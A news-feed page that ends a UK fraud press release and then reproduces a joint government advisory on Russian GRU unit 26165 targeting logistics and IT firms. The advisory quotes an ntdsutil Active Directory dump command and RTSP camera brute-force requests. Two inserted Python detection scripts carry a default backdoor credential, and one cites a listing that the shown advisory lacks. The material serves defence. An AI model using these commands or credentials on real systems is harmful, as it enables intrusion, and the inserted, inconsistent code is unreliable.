    This notice required the production of their evidence of plastic waste exports. In response, Qin sent a computer memory stick containing his business’ waste export evidence and a letter explaining a large discrepancy, described as an “overclaim.”

    The letter stated that of the 1,239 metric tonnes of plastic waste exports the company had claimed for 2022, only 453.60 metric tonnes were genuine, and that the majority of its trading, 785.40 metric tonnes, was ‘a mistake.’

    In sentencing the judge said this was without doubt deliberate offending and pre-planned. There had been a significant undermining of the regulatory regime. 

    He accepted that there had been a guilty plea entered at first opportunity and that money had been put aside to repay the financial benefit made. The company was also fined to mark the seriousness of the offending.

    Sham Singh, Senior Environmental Crime Officer for the Environment Agency, said:

    “This case shows that the Environment Agency will pursue individuals and their enterprises who profit illegally.

    “This was a fraud on a large scale and undermines legitimate business and the investment and economic growth that go with it.

    “We support legitimate businesses and are proactively supporting them by disrupting and stopping the criminal element backed up by the threat of tough enforcement as in this case.

    “If anyone suspects that a company is doing something wrong, please contact the Environment Agency on 0800 80 70 60 or report it anonymously to Crimestoppers on 0800 555 111.”

    The Charges

    Shaobo Qin

    Between 1st January 2022 and 31st January 2023 dishonestly and intending thereby to make a gain for himself or another, or to cause loss to another, or to expose another to the risk of loss, made a false representation to the online National Packaging Waste Database which was and which he knew was, or might be, untrue or misleading, namely, that the 785.4 tonnes of plastic waste that he claimed EDU Case UK Ltd had exported over that period, had all actually been exported when it had not, contrary to Sections 1 and 2 of the Fraud Act 2006.

    EDU Case UK Limited (Company No. 08888722)

    Between 1st January  2022 and 31st January 2023 dishonestly and intending thereby to make a gain for himself or another, or to cause loss to another, or to expose another to the risk of loss, made a false representation to the online National Packaging Waste Database which was and which he knew was, or might be, untrue or misleading, namely, that the 785.4 tonnes of plastic waste that EDU Case UK Ltd had exported over that period, had all actually been exported when it had not, contrary to Sections 1 and 2 of the Fraud Act 2006.

    Background Information

    The Packaging Producer Responsibility Regulations were introduced to oblige the producers of waste packaging such as plastic, glass and cardboard (e.g. supermarkets) to contribute towards the financial cost of recycling and the disposal of waste. Any large organisation that meets the criteria for this obligation is required to prove they have made such financial contributions by the purchasing of credits known as Packaging Recovery Notes (PRNs) or Packaging Export Recovery Notes (PERNs) from UK waste reprocessors and waste exporters.

    Published 21 May 2025

    MIL OSI United Kingdom

  • MIL-OSI Security: Russian GRU Targeting Western Logistics Entities and Technology Companies

    Source: US Department of Homeland Security

    Executive Summary

    This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “Cybersecurity Industry Tracking”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.

    Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.

    This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide scale targeting of IP cameras in Ukraine and bordering NATO nations.

    The following authors and co-sealers are releasing this CSA:

    • United States National Security Agency (NSA)
    • United States Federal Bureau of Investigation (FBI)
    • United Kingdom National Cyber Security Centre (NCSC-UK)
    • Germany Federal Intelligence Service (BND) Bundesnachrichtendienst
    • Germany Federal Office for Information Security (BSI) Bundesamt für Sicherheit in der Informationstechnik
    • Germany Federal Office for the Protection of the Constitution (BfV) Bundesamt für Verfassungsschutz
    • Czech Republic Military Intelligence (VZ) Vojenské zpravodajství
    • Czech Republic National Cyber and Information Security Agency (NÚKIB) Národní úřad pro kybernetickou a informační bezpečnost
    • Czech Republic Security Information Service (BIS) Bezpečnostní informační služba
    • Poland Internal Security Agency (ABW) Agencja Bezpieczeństwa Wewnętrznego
    • Poland Military Counterintelligence Service (SKW) Służba Kontrwywiadu Wojskowego
    • United States Cybersecurity and Infrastructure Security Agency (CISA)
    • United States Department of Defense Cyber Crime Center (DC3)
    • United States Cyber Command (USCYBERCOM)
    • Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)
    • Canadian Centre for Cyber Security (CCCS)
    • Danish Defence Intelligence Service (DDIS) Forsvarets Efterretningstjeneste
    • Estonian Foreign Intelligence Service (EFIS) Välisluureamet
    • Estonian National Cyber Security Centre (NCSC-EE) Küberturvalisuse keskus
    • French Cybersecurity Agency (ANSSI) Agence nationale de la sécurité des systèmes d’information
    • Netherlands Defence Intelligence and Security Service (MIVD) Militaire Inlichtingen- en Veiligheidsdienst

    Download the PDF version of this report:

    Russian GRU Targeting Western Logistics Entities and Technology Companies (PDF, 1,081KB)

    For a downloadable list of IOCs, visit:

    Introduction

    For over two years, the Russian GRU 85th GTsSS, military unit 26165—commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers—has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions.

    In late February 2022, multiple Russian state-sponsored cyber actors increased the variety of cyber operations for purposes of espionage, destruction, and influence—with unit 26165 predominately involved in espionage. [1] As Russian military forces failed to meet their military objectives and Western countries provided aid to support Ukraine’s territorial defense, unit 26165 expanded its targeting of logistics entities and technology companies involved in the delivery of aid. These actors have also targeted Internet-connected cameras at Ukrainian border crossings to monitor and track aid shipments.

    Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 17. See Appendix A: MITRE ATT&CK tactics and techniques for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. This advisory uses the MITRE D3FEND® framework, version 1.0.

    Description of Targets

    The GRU unit 26165 cyber campaign against Western logistics providers and technology companies has targeted dozens of entities, including government organizations and private/commercial entities across virtually all transportation modes: air, sea, and rail. These actors have targeted entities associated with the following verticals within NATO member states, Ukraine, and at international organizations: 

    • Defense Industry
    • Transportation and Transportation Hubs (ports, airports, etc.)
    • Maritime
    • Air Traffic Management
    • IT Services

    In the course of the targeting lifecycle, unit 26165 actors identified and conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access [T1199].

    The actors also conducted reconnaissance on at least one entity involved in the production of industrial control system (ICS) components for railway management, though a successful compromise was not confirmed [TA0043].

    The countries with targeted entities include the following, as illustrated in Figure 1:

    • Bulgaria
    • Czech Republic
    • France
    • Germany
    • Greece
    • Italy
    • Moldova
    • Netherlands
    • Poland
    • Romania
    • Slovakia
    • Ukraine
    • United States

    Figure 1: Countries with Targeted Entities

    Initial Access TTPs

    Unit 26165 actors used several techniques to gain initial access to targeted entities, including (but not limited to) the following:

    The actors abused vulnerabilities associated with a range of brands and models of small office/home office (SOHO) devices to facilitate covert cyber operations, as well as proxy malicious activity via devices with geolocation in proximity to the target [T1665]. [2]

    Credential Guessing/Brute Force

    Unit 26165 actors’ credential guessing [T1110.001] operations in this campaign exhibit some similar characteristics to those disclosed in the previous CSA “Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.” [3] Based on victim network investigations, the current iteration of this TTP employs a similar blend of anonymization infrastructure, including the use of Tor and commercial VPNs [T1090.003]. The actors frequently rotated the IP addresses used to further hamper detection. All observed connections were made via encrypted TLS [T1573]. 

    Spearphishing

    GRU unit 26165 actors’ spearphishing emails included links [T1566.002] leading to fake login pages impersonating a variety of government entities and Western cloud email providers’ webpages. These webpages were typically hosted on free third-party services or compromised SOHO devices and often used legitimate documents associated with thematically similar entities as lures. The subjects of spearphishing emails were diverse and ranged from professional topics to adult themes. Phishing emails were frequently sent via compromised accounts or free webmail accounts [T1586.002, T1586.003]. The emails were typically written in the target’s native language and sent to a single targeted recipient. 

    Some campaigns employed multi-stage redirectors [T1104] verifying IP-geolocation [T1627.001] and browser fingerprints [T1627] to protect credential harvesting infrastructure or provide multifactor authentication (MFA) [T1111] and CAPTCHA relaying capabilities [T1056]. Connecting endpoints failing the location checks were redirected to a benign URL [T1627], such as msn.com. Redirector services used include:

    • Webhook[.]site
    • FrgeIO
    • InfinityFree
    • Dynu
    • Mocky
    • Pipedream
    • Mockbin[.]org

    The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executables [T1204.002] delivered via third-party services and redirectors [T1566.002], scripts in a mix of languages [T1059] (including BAT [T1059.003] and VBScript [T1059.005]) and links to hosted shortcuts [T1204.001].

    CVE Usage

    Throughout this campaign, GRU unit 26165 weaponized an Outlook NTLM vulnerability (CVE-2023-23397) to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations [T1187]. [4],[5] These actors also used a series of Roundcube CVEs (CVE-2020-12641, CVE-2020-35730, and CVE-2021-44026) to execute arbitrary shell commands [T1059], gain access to victim email accounts, and retrieve sensitive data from email servers [T1114].

    Since at least fall 2023, the actors leveraged a WinRAR vulnerability (CVE-2023-38831) allowing for the execution of arbitrary code embedded in an archive as a means of initial access [T1659]. The actors sent emails with malicious attachments [T1566.001] or embedded hyperlinks [T1566.002] that downloaded a malicious archive prepared using this CVE. 

    Post-Compromise TTPs

    After an initial compromise using one of the above techniques, unit 26165 actors conducted contact information reconnaissance to identify additional targets in key positions [T1589.002]. The actors also conducted reconnaissance of the cybersecurity department [T1591], individuals responsible for coordinating transport [T1591.004], and other companies cooperating with the victim entity [T1591.002].

    The actors used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment [TA0008]. Multiple Impacket scripts were used as .exe files, in addition to the Python versions, depending on the victim environment. The actors also moved laterally within the network using Remote Desktop Protocol (RDP) [T1021.001] to access additional hosts and attempted to dump Active Directory NTDS.dit domain databases [T1003.003] using native Active Directory Domain Services commands, such as in Figure 2: Example Active Directory Domain Services command:

    C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit

    Figure 2: Example Active Directory Domain Services command

    Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory. The actors installed Python [T1059.006] on infected machines to enable the execution of Certipy. Accessed files were archived in .zip files prior to exfiltration [T1560]. The actors attempted to exfiltrate archived data via a previously dropped OpenSSH binary [T1048].

    Incident response investigations revealed that the actors would take steps to locate and exfiltrate lists of Office 365 users and set up sustained email collection. The actors used manipulation of mailbox permissions [T1098.002] to establish sustained email collection at compromised logistics entities, as detailed in a Polish Cybercommand blog. [6]

    After initial authentication, unit 26165 actors would change accounts’ folder permissions and enroll compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access [T1556.006]. The actors leveraged python scripts to retrieve plaintext passwords via Group Policy Preferences [T1552.006] using Get-GPPPassword.py and a modified ldap-dump.py to enumerate the Windows environment [T1087.002] and conduct a brute force password spray [T1110.003] via Lightweight Directory Access Protocol (LDAP). The actors would additionally delete event logs through the wevtutil utility [T1070.001].
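    A hunt over Exchange admin audit records for the mailbox-permission changes described above, as an added example that is not part of the advisory or the Polish Cybercommand blog it cites; the record field names (Operation, UserId, ClientIP, Parameters) and the sample records are assumptions constructed for the example:

```python
"""Hunt for mailbox-permission manipulation (ATT&CK T1098.002) of the kind
the advisory describes for sustained email collection.

Added example, not from the advisory or the blog it cites. Input records
are constructed here in the shape of Exchange admin audit entries as
exported from the Microsoft 365 unified audit log; the field names used
(Operation, UserId, ClientIP, Parameters[{Name,Value}]) are an assumption
to adapt to your own export.
"""
import json
from collections import defaultdict

# Cmdlets that grant or alter access to a mailbox or one of its folders.
PERMISSION_OPS = {"Add-MailboxPermission", "Add-MailboxFolderPermission",
                  "Set-MailboxFolderPermission"}
# Built-in grantees: rights for these expose a folder to every user in the
# tenant (Default) or to unauthenticated access (Anonymous).
BROAD_GRANTEES = {"default", "anonymous"}
# Roles/rights that allow reading messages, not merely seeing the folder.
READ_RIGHTS = {"fullaccess", "owner", "publishingeditor", "editor",
               "publishingauthor", "author", "reviewer", "readitems"}
# One actor touching this many distinct mailboxes is worth a look on its own.
BURST_THRESHOLD = 3


def _params(rec):
    return {p["Name"].lower(): str(p["Value"]) for p in rec.get("Parameters", [])}


def _mailbox(identity):
    # Folder identities look like "alice@example.test:\Inbox"; keep the owner.
    return identity.split(":", 1)[0].strip().lower()


def classify(rec):
    """Return a list of reasons a single record is suspicious (empty if not)."""
    if rec.get("Operation") not in PERMISSION_OPS:
        return []
    p = _params(rec)
    grantee = p.get("user", "").lower()
    rights = {r.strip().lower() for r in p.get("accessrights", "").split(",") if r.strip()}
    mailbox = _mailbox(p.get("identity", ""))
    if not rights & READ_RIGHTS:
        return []  # e.g. AccessRights=None, which removes access rather than granting it
    if grantee in BROAD_GRANTEES:
        return [f"{rec['Operation']}: built-in '{grantee}' granted {sorted(rights)} on {mailbox}"]
    if grantee and grantee != mailbox:
        return [f"{rec['Operation']}: {grantee} granted {sorted(rights)} on {mailbox}"]
    return []


def hunt(records):
    """Per-record findings plus one burst finding per actor touching many mailboxes."""
    alerts = []
    touched = defaultdict(set)
    for rec in records:
        for reason in classify(rec):
            alerts.append({"time": rec.get("CreationTime"), "actor": rec.get("UserId"),
                           "ip": rec.get("ClientIP"), "reason": reason})
            touched[rec.get("UserId")].add(_mailbox(_params(rec).get("identity", "")))
    for actor, boxes in touched.items():
        if len(boxes) >= BURST_THRESHOLD:
            alerts.append({"time": None, "actor": actor, "ip": None,
                           "reason": f"{actor} altered permissions on {len(boxes)} mailboxes"})
    return alerts


# Constructed audit records: three broad grants by one admin account, one
# FullAccess grant to another user's mailbox, one benign removal and one
# unrelated operation.
SAMPLE_AUDIT = r"""
{"CreationTime":"2024-03-01T08:02:11","Operation":"Set-MailboxFolderPermission","UserId":"svc-admin@example.test","ClientIP":"198.51.100.7","Parameters":[{"Name":"Identity","Value":"alice@example.test:\\Inbox"},{"Name":"User","Value":"Default"},{"Name":"AccessRights","Value":"Reviewer"}]}
{"CreationTime":"2024-03-01T08:03:40","Operation":"Add-MailboxPermission","UserId":"bob@example.test","ClientIP":"198.51.100.7","Parameters":[{"Name":"Identity","Value":"carol@example.test"},{"Name":"User","Value":"bob@example.test"},{"Name":"AccessRights","Value":"FullAccess"}]}
{"CreationTime":"2024-03-01T09:15:02","Operation":"Set-MailboxFolderPermission","UserId":"svc-admin@example.test","ClientIP":"203.0.113.20","Parameters":[{"Name":"Identity","Value":"dave@example.test:\\Calendar"},{"Name":"User","Value":"Default"},{"Name":"AccessRights","Value":"None"}]}
{"CreationTime":"2024-03-01T09:20:55","Operation":"New-InboxRule","UserId":"erin@example.test","ClientIP":"203.0.113.20","Parameters":[{"Name":"Name","Value":"tidy"}]}
{"CreationTime":"2024-03-01T08:04:12","Operation":"Add-MailboxFolderPermission","UserId":"svc-admin@example.test","ClientIP":"198.51.100.7","Parameters":[{"Name":"Identity","Value":"erin@example.test:\\Inbox"},{"Name":"User","Value":"Anonymous"},{"Name":"AccessRights","Value":"Reviewer"}]}
{"CreationTime":"2024-03-01T08:05:03","Operation":"Set-MailboxFolderPermission","UserId":"svc-admin@example.test","ClientIP":"198.51.100.7","Parameters":[{"Name":"Identity","Value":"frank@example.test:\\Inbox"},{"Name":"User","Value":"Default"},{"Name":"AccessRights","Value":"Reviewer"}]}
""".strip().splitlines()
SAMPLE_RECORDS = [json.loads(line) for line in SAMPLE_AUDIT]

if __name__ == "__main__":
    for a in hunt(SAMPLE_RECORDS):
        print(f"{a['time']} {a['actor']} {a['ip']}: {a['reason']}")
```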

    After gaining initial access to the network, the actors pursued further access to accounts with access to sensitive information on shipments, such as train schedules and shipping manifests. These accounts contained information on aid shipments to Ukraine, including: 

    • sender,
    • recipient,
    • train/plane/ship numbers,
    • point of departure,
    • destination,
    • container registration numbers,
    • travel route, and
    • cargo contents. 

    In at least one instance, the actors attempted to use voice phishing [T1566.004] to gain access to privileged accounts by impersonating IT staff.

    Malware

    Unit 26165’s use of malware in this campaign ranged from gaining initial access to establishing persistence and exfiltrating data. In some cases, the attack chain resulted in multiple pieces of malware being deployed in succession. The actors used dynamic link library (DLL) search order hijacking [T1574.001] to facilitate malware execution. There were a number of known malware variants tied to this campaign against logistics sector victims, including:

    • HEADLACE [7]
    • MASEPIE [8]

    While other malware variants, such as OCEANMAP and STEELHOOK [8], were not directly observed targeting logistics or IT entities, their deployment against victims in other sectors in Ukraine and other Western countries suggests that they could be deployed against logistics and IT entities should the need arise.

    Persistence

    In addition to the abovementioned mailbox permissions abuse, unit 26165 actors also used scheduled tasks [T1053.005], run keys [T1547.001], and placed malicious shortcuts [T1547.009] in the startup folder to establish persistence. 

    Exfiltration

    GRU unit 26165 actors used a variety of methods for data exfiltration that varied based on the victim environment, including both malware and living off the land binaries. PowerShell commands [T1059.001] were often used to prepare data for exfiltration; for example, the actors prepared zip archives [T1560.001] for upload to their own infrastructure. 

    The actors also used server data exchange protocols and Application Programming Interfaces (APIs) such as Exchange Web Services (EWS) and Internet Message Access Protocol (IMAP) [T1114.002] to exfiltrate data from email servers. In multiple instances, the actors used periodic EWS queries [T1119] to collect new emails sent and received since the last data exfiltration [T1029]. The actors typically used infrastructure in close geographic proximity to the victim. Long gaps between exfiltration, the use of trusted and legitimate protocols, and the use of local infrastructure allowed for long-term collection of sensitive data to go undetected. 

    Connections to Targeting of IP Cameras

    In addition to targeting logistics entities, unit 26165 actors likely used access to private cameras at key locations, such as near border crossings, military installations, and rail stations, to track the movement of materials into Ukraine. The actors also used legitimate municipal services, such as traffic cams. 

    The actors targeted Real Time Streaming Protocol (RTSP) servers hosting IP cameras primarily located in Ukraine as early as March 2022 in a large-scale campaign, which included attempts to enumerate devices [T1592] and gain access to the cameras’ feeds [T1125]. Actor-controlled servers sent RTSP DESCRIBE requests destined for RTSP servers, primarily hosting IP cameras [T1090.002]. The DESCRIBE requests were crafted to obtain access to IP cameras located on logically distinct networks from that of the routers that received the request. The requests included Base64-encoded credentials for the RTSP server, which included publicly documented default credentials and likely generic attempts to brute force access to the devices [T1110]. An example of an RTSP request is shown in Figure 3.

    DESCRIBE rtsp://[IP ADDRESS] RTSP/1.0
    CSeq: 1
    Authorization: Basic
    User-Agent: WebClient
    Accept: application/sdp

    DESCRIBE rtsp://[IP ADDRESS] RTSP/1.0
    CSeq: 2
    Authorization: Digest username="admin", realm="[a-f0-9]{12}", algorithm="MD5", nonce="[a-f0-9]{32}", uri="", response="[a-f0-9]{32}"
    User-Agent: WebClient
    Accept: application/sdp

    Figure 3: Example RTSP request

    Successful RTSP 200 OK responses contained a snapshot of the IP camera’s image and IP camera metadata such as video codec, resolution, and other properties depending on the IP camera’s configuration. 
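
    A defender-side check for the request pattern in Figure 3, as an added example that is not part of the advisory: it parses RTSP DESCRIBE requests, flags Basic credentials equal to the Hikvision backdoor string listed later in this advisory or carrying a default username, flags Digest attempts with a default username, and counts distinct credentials per source to surface brute forcing. The sample requests, addresses (TEST-NET ranges), the DEFAULT_USERNAMES list and the threshold are constructed assumptions.

```python
"""Added example, not part of the advisory: parse RTSP DESCRIBE requests of the
form shown in Figure 3 and flag default/backdoor credentials and brute forcing.
All sample requests and addresses below are constructed (TEST-NET ranges)."""
import base64
import binascii
import re
from collections import defaultdict

# The Hikvision backdoor string listed in this advisory (decodes to "admin:11\n").
KNOWN_BAD_BASIC = {"YWRtaW46MTEK"}
# Usernames treated as default/generic for this example (assumed list).
DEFAULT_USERNAMES = {"admin", "root", "user"}
# Distinct Authorization values from one source before we call it brute forcing.
BRUTE_FORCE_THRESHOLD = 3

_DIGEST_USER = re.compile(r'username="([^"]*)"')


def parse_rtsp_request(raw):
    """Split one RTSP request into method, URI, version and a lowercase header map."""
    lines = [line for line in raw.splitlines() if line.strip()]
    method, uri, version = lines[0].split(maxsplit=2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "uri": uri, "version": version, "headers": headers}


def classify_request(req):
    """Return the reasons a DESCRIBE request looks suspicious (empty list if none)."""
    reasons = []
    if req["method"] != "DESCRIBE":
        return reasons
    scheme, _, param = req["headers"].get("authorization", "").partition(" ")
    if scheme == "Basic":
        if param in KNOWN_BAD_BASIC:
            reasons.append("known-backdoor-credential")
        else:
            try:
                decoded = base64.b64decode(param, validate=True).decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                decoded = ""
            user = decoded.split(":", 1)[0]
            if user in DEFAULT_USERNAMES:
                reasons.append("default-username:" + user)
    elif scheme == "Digest":
        match = _DIGEST_USER.search(param)
        if match and match.group(1) in DEFAULT_USERNAMES:
            reasons.append("default-username:" + match.group(1))
    return reasons


def detect_brute_force(events, threshold=BRUTE_FORCE_THRESHOLD):
    """events: iterable of (source_ip, raw_request). Returns the sources that
    tried at least `threshold` distinct Authorization values in DESCRIBE requests."""
    tried = defaultdict(set)
    for source, raw in events:
        req = parse_rtsp_request(raw)
        auth = req["headers"].get("authorization")
        if req["method"] == "DESCRIBE" and auth:
            tried[source].add(auth)
    return {src for src, creds in tried.items() if len(creds) >= threshold}


def _describe(cseq, authorization):
    """Build a DESCRIBE request with the same headers as Figure 3 (constructed)."""
    return (
        f"DESCRIBE rtsp://192.0.2.10/ RTSP/1.0\r\n"
        f"CSeq: {cseq}\r\n"
        f"Authorization: {authorization}\r\n"
        "User-Agent: WebClient\r\n"
        "Accept: application/sdp\r\n\r\n"
    )


def _basic(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


# Constructed sample: one source cycling through credentials, one legitimate viewer.
SAMPLE_EVENTS = [
    ("198.51.100.7", _describe(1, "Basic YWRtaW46MTEK")),
    ("198.51.100.7", _describe(2, 'Digest username="admin", realm="0123456789ab", '
                               'algorithm="MD5", nonce="%s", uri="", response="%s"'
                               % ("0" * 32, "f" * 32))),
    ("198.51.100.7", _describe(3, _basic("root", "constructed-guess-1"))),
    ("203.0.113.5", _describe(1, _basic("operator", "Lz8!vQ2-constructed"))),
]


def analyze(events=SAMPLE_EVENTS):
    """Return flagged requests keyed by (source, CSeq) plus the brute-forcing sources."""
    flagged = {}
    for source, raw in events:
        req = parse_rtsp_request(raw)
        reasons = classify_request(req)
        if reasons:
            flagged[(source, req["headers"]["cseq"])] = reasons
    return {"flagged": flagged, "brute_force": detect_brute_force(events)}


if __name__ == "__main__":
    print(analyze())
```

On real traffic the events would come from a packet capture or RTSP server log rather than the constructed list; the per-source counting is what separates a single mistyped password from the credential cycling described above.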

    In a sample of over 10,000 cameras targeted by this effort that was available to the authoring agencies, the geographic distribution of victims showed a strong focus on cameras in Ukraine and bordering countries, as shown in Table 1:

    Table 1: Geographic distribution of targeted IP cameras
    Country     Percentage of total attempts
    Ukraine     81.0%
    Romania      9.9%
    Poland       4.0%
    Hungary      2.8%
    Slovakia     1.7%
    Others       0.6%

    Mitigation Actions

    General Security Mitigations

    Architecture and Configuration

    • Employ appropriate network segmentation [D3-NI] and restrictions to limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisions [D3-AMED].
      • Consider Zero Trust principles when designing systems. Base product choices on how those products can solve specific risks identified as part of the end-to-end design. [9]
    • Ensure that host firewalls and network security appliances (e.g., firewalls) are configured to only allow legitimately needed data flows between devices and servers to prevent lateral movement [D3-ITF]. Alert on attempts to connect laterally between host devices or other unusual data flows.
    • Use automated tools to audit access logs for security concerns and identify anomalous access requests [D3-RAPA].
    • For organizations using on-premises authentication and email services, block and alert on NTLM/SMB requests to external infrastructure [D3-OTF].
    • Utilize endpoint detection and response (EDR) and other cybersecurity solutions on all systems, prioritizing high value systems with large amounts of sensitive data, such as mail servers and domain controllers [D3-PM], first.
      • Perform threat and attack modeling to understand how sensitive systems may be compromised within an organization’s specific architecture and security controls. Use this to develop a monitoring strategy to detect compromise attempts and select appropriate products to enact this strategy.
    • Collect and monitor Windows logs for certain events, especially for events that indicate that a log was cleared unexpectedly [D3-SFA].
    • Enable optional security features in Windows to harden endpoints and mitigate initial access techniques [D3-AH]:
      • Enable attack surface reduction rules to prevent executable content from email [D3-ABPI].
      • Enable attack surface reduction rules to prevent execution of files from globally writeable directories, such as Downloads or %APPDATA% [D3-EAL].
      • Unless users are involved in the development of scripts, limit the local execution of scripts (such as batch scripts, VBScript, JScript/JavaScript, and PowerShell [10]) to known scripts [D3-EI], and audit execution attempts.
      • Disable Windows Script Host functionality and configure PowerShell to run in Constrained Language mode [D3-ACH].
    • Where feasible, implement allowlisting for applications and scripts to limit execution to only those needed for authorized activities, blocking all others by default [D3-EAL].
    • Consider using open source SIGMA rules as a baseline for detecting and alerting on suspicious file execution or command parameters [D3-PSA].
    • Use services that provide enhanced browsing services and safe link checking [D3-URA]. Significant reductions in successful spearphishing attempts were noted when email providers began offering link checking and automatic file detonation to block malicious content.
    • Where possible, block logins from public VPNs, including exit nodes in the same country as target systems, or, if they need to be allowed, alert on them for further investigation. Most organizations should not need to allow incoming traffic, especially logins to systems, from VPN services [D3-NAM].
    • Educate users to only use approved corporate systems for relevant government and military business and avoid the use of personal accounts on cloud email providers to conduct official business. Network administrators should also audit both email and web request logs to detect such activity.

    Many organizations may not need to allow outgoing traffic to hosting and API mocking services, which are frequently used by GRU unit 26165. Organizations should consider alerting on or blocking the following services, with exceptions allowlisted for legitimate activity [D3-DNSDL].

    Heuristic detections for web requests to new subdomains, including of the above providers, may uncover malicious phishing activity [D3-DNRA]. Logging the requests for each sub-domain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims.

    Identity and Access Management

    Organizations should take measures to ensure strong access controls and mitigate against common credential theft techniques: 

    • Use MFA with strong factors, such as passkeys or PKI smartcards, and require regular re-authentication [D3-MFA]. [11], [12] Strong authentication factors are not guessable using dictionary techniques, so they resist brute force attempts.
    • Implement other mitigations for privileged accounts: including limiting the number of admin accounts, considering using hardware MFA tokens, and regularly reviewing all privileged user accounts [D3-JFAPA].
    • Separate privileged accounts by role and alert on misuse of privileged accounts [D3-UAP]. For example, email administrator accounts should be different from domain administrator accounts.
    • Reduce reliance on passwords; instead, consider using services like single sign-on [D3-TBA].
      • For organizations using on-premises authentication and email services, plan to disable NTLM entirely and migrate to more robust authentication processes such as PKI certificate authentication.
    • Do not store passwords in Group Policy Preferences (GPP). Remove all passwords previously included in GPP and change all passwords on the corresponding accounts [D3-CH]. [13]
    • Use account throttling or account lockout [D3-ANET]:
      • Throttling is preferred to lockout. Throttling progressively increases time delay between successive login attempts.
      • Account lockout can leave legitimate users unable to access their accounts and requires access to an account recovery process.
      • Account lockout can provide a malicious actor with an easy way to launch a Denial of Service (DoS).
      • If using lockout, then allowing 5 to 10 attempts before lockout is recommended.
    • Use a service to check for compromised passwords before using them [D3-SPP]. For example, “Have I Been Pwned” can be used to check whether a password has been previously compromised without disclosing the potential password.
    • Change all default credentials [D3-CRO] and disable protocols that use weak authentication (e.g., clear-text passwords or outdated and vulnerable authentication or encryption protocols) or do not support multi-factor authentication [D3-ACH] [D3-ET]. Always configure access controls carefully to ensure that only well-maintained and well-authenticated accounts have access. [13]

    IP Camera Mitigations

    The following mitigation techniques for IP cameras can be used to defend against this type of malicious activity:

    • Ensure IP cameras are currently supported. Replace devices that are out of support.
    • Apply security patches and firmware updates to all IP cameras [D3-SU].
    • Disable remote access to the IP camera, if unnecessary [D3-ITF].
    • Ensure cameras are protected by a security appliance, if possible, such as by using a firewall to prevent communication with the camera from IP addresses not on an allowlist [D3-NAM].
    • If remote access to IP camera feeds is required, ensure authentication is enabled [D3-AA] and use a VPN to connect remotely [D3-ET]. Use MFA for management accounts if supported [D3-MFA].
    • Disable Universal Plug and Play (UPnP), Peer-to-Peer (P2P), and Anonymous Visit features on IP cameras and routers [D3-NI].
    • Turn off other ports/services not in use (e.g., FTP, web interface, etc.) [D3-ACH].
    • If supported, enable authenticated RTSP access only [D3-AA].
    • Review all authentication activity for remote access to make sure it is valid and expected [D3-UBA]. Investigate any unexpected or unusual activity.
    • Audit IP camera user accounts to ensure they are an accurate reflection of your organization and that they are being used as expected [D3-UAP].
    • Configure, tune, and monitor logging—if available—on the IP camera.

    Indicators of Compromise (IOCs)

    Note: Specific IOCs may no longer be actor controlled, may themselves be compromised infrastructure or email accounts, or may be shared infrastructure such as public VPN or Tor exit nodes. Care should be taken when triaging logs or developing detection rules based on these indicators. GRU unit 26165 almost certainly uses extensive further infrastructure and TTPs not specifically listed in this report.

    Utilities and scripts

    Legitimate utilities

    Unauthorized or unusual use of the following legitimate utilities can be an indication of a potential compromise:

    • ntdsutil – A legitimate Windows executable used by threat actors to export contents of Active Directory
    • wevtutil – A legitimate Windows executable used by threat actors to delete event logs
    • vssadmin – A legitimate Windows executable possibly used by threat actors to make a copy of the server’s C: drive
    • ADExplorer – A legitimate Windows executable used to view, edit, and back up Active Directory Certificate Services
    • OpenSSH – The Windows version of a legitimate open source SSH client
    • schtasks – A legitimate Windows executable used to create persistence using scheduled tasks
    • whoami – A legitimate Windows executable used to retrieve the name of the current user
    • tasklist – A legitimate Windows executable used to retrieve the list of running processes
    • hostname – A legitimate Windows executable used to retrieve the device name
    • arp – A legitimate Windows executable used to retrieve the ARP table for mapping the network environment
    • systeminfo – A legitimate Windows executable used to retrieve a comprehensive summary of device and operating system information
    • net – A legitimate Windows executable used to retrieve detailed user information
    • wmic – A legitimate Windows executable used to interact with Windows Management Instrumentation (WMI), such as to retrieve letters assigned to logical partitions on storage drives
    • cacls – A legitimate Windows executable used to modify permissions on files
    • icacls – A legitimate Windows executable used to modify permissions to files and handle integrity levels and ownership
    • ssh – A legitimate Windows executable used to establish network shell connections
    • reg – A legitimate Windows executable used to add to or modify the system registry 

